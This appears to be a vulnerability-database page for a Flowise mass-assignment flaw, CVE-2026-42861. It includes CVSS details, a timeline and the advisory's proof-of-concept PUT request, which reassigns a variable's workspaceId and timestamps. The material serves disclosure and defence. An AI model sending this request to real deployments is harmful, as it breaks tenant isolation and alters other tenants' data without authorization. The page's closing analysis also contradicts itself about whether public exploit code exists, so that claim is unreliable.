Skip to main content

CVE-2026-42861

| EUVDEUVD-2026-35103 HIGH
Improper Access Control (CWE-284)
2026-05-14 https://github.com/FlowiseAI/Flowise GHSA-6fw7-3q8r-m5vj
7.6
CVSS 4.0 · Vendor: https://github.com/FlowiseAI/Flowise
Share

Severity by source

Vendor (https://github.com/FlowiseAI/Flowise) PRIMARY
7.6 HIGH
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from Vendor (https://github.com/FlowiseAI/Flowise) · only source for this CVE.

CVSS VectorVendor: https://github.com/FlowiseAI/Flowise

CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
High
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

9
Analysis Updated
Jun 08, 2026 - 16:44 vuln.today
v5 (cvss_changed)
Analysis Updated
Jun 08, 2026 - 16:44 vuln.today
v4 (cvss_changed)
Analysis Updated
Jun 08, 2026 - 16:43 vuln.today
v3 (cvss_changed)
Analysis Updated
Jun 08, 2026 - 16:42 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Jun 08, 2026 - 16:22 vuln.today
cvss_changed
CVSS changed
Jun 08, 2026 - 16:22 NVD
7.6 (HIGH)
Source Code Evidence Fetched
May 14, 2026 - 15:30 vuln.today
Analysis Generated
May 14, 2026 - 15:30 vuln.today
CVE Published
May 14, 2026 - 14:52 nvd
HIGH

DescriptionCVE.org

Summary

A Mass Assignment vulnerability exists in the variable update endpoint of FlowiseAI.

The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating a variable resource.

Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign variables to arbitrary workspaces.

This behavior may break tenant isolation in multi-workspace environments.

Details

The endpoint responsible for updating variables:

PUT /api/v1/variables/{variableId}

accepts a JSON request body containing the variable definition.

However, the backend does not restrict which attributes can be modified by the client. As a result, user-controlled request bodies can include internal properties that should normally be controlled exclusively by the server.

Server-controlled fields that can be manipulated include:

  • workspaceId
  • createdDate
  • updatedDate

These fields appear to be directly mapped to the database entity without strict input validation or authorization checks.

For example, the following request body was accepted by the server:

json
{
  "name": "aaa",
  "value": "bbbe",
  "type": "static",
  "createdDate": "2016-03-06T17:59:30.000Z",
  "updatedDate": "2016-03-06T18:00:17.000Z",
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

The server accepted the attacker-controlled workspaceId and metadata fields and persisted them.

PoC

Request

http
PUT /api/v1/variables/<VARIABLE_ID>
Content-Type: application/json

{
  "name": "aaa",
  "value": "bbbe",
  "type": "static",
  "createdDate": "2016-03-06T17:59:30.000Z",
  "updatedDate": "2016-03-06T18:00:17.000Z",
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

Response

json
{
  "id": "0a2b9f61-4a97-4ff8-b80d-00275ed18674",
  "name": "aaa",
  "value": "bbbe",
  "type": "static",
  "createdDate": "2016-03-06T17:59:30.000Z",
  "updatedDate": "2026-03-06T18:05:17.000Z",
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

This confirms that the backend accepts and persists attacker-controlled internal properties.

Impact

This vulnerability allows authenticated users to manipulate internal attributes of variable resources.

Possible impacts include:

  1. Cross-workspace reassignment of variables (workspaceId)
  2. Unauthorized modification of metadata (createdDate, updatedDate)
  3. Potential tenant isolation bypass in multi-workspace deployments

In multi-tenant environments, this may allow an attacker to move variables between workspaces without authorization.

AnalysisAI

Mass assignment in FlowiseAI Flowise allows authenticated low-privilege users to modify server-controlled properties on the PUT /api/v1/variables/{variableId} endpoint, including workspaceId, createdDate, and updatedDate. By reassigning a variable's workspaceId to an arbitrary value, an attacker can break tenant isolation in multi-workspace deployments and move variables across tenant boundaries. Publicly available exploit code exists in the GHSA-6fw7-3q8r-m5vj advisory, but no public exploit identified at time of analysis as widespread weaponization, and the issue is not listed in CISA KEV.

Share

CVE-2026-42861 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy